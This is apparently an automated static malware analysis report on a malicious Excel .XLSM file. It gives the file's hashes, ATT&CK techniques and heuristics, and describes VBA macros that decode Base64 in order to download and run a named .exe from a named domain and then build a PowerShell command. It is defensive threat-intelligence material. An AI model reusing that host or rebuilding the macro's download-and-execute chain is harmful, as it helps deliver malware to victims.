Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 db3f92f095d2ddc0…

MALICIOUS

Office (OOXML) / .XLSM

102.9 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300
MD5: dda42b3070fa52baa57b39cf06a45d66 SHA-1: a6a6cf4b87c71a2e47295a55f4bf149c01af42d5 SHA-256: db3f92f095d2ddc0e019b2f387bf03b04db4115162472565800f10eba26be5b1
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains VBA macros that utilize the Shell() function to execute commands. Specifically, it decodes a Base64 string which, when executed, downloads a file named 'C87b1mDlYqH306206IMG.exe' from 'http://coachcarnewilliamltd.com/' and then executes it. The VBA code also reconstructs a PowerShell command to execute, likely for further payload delivery or obfuscation.

Heuristics 2

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
ecec8d14da664575f227b29dcaf91495ce50d36d9ff7d0ff47647be8130fbdb4		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2635 bytes
vbaProject_00.bin
51bf4e27c2fc0e6181932fc2c121de333a200309ffd0b1ef032664e8a7cfcb7b		 vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.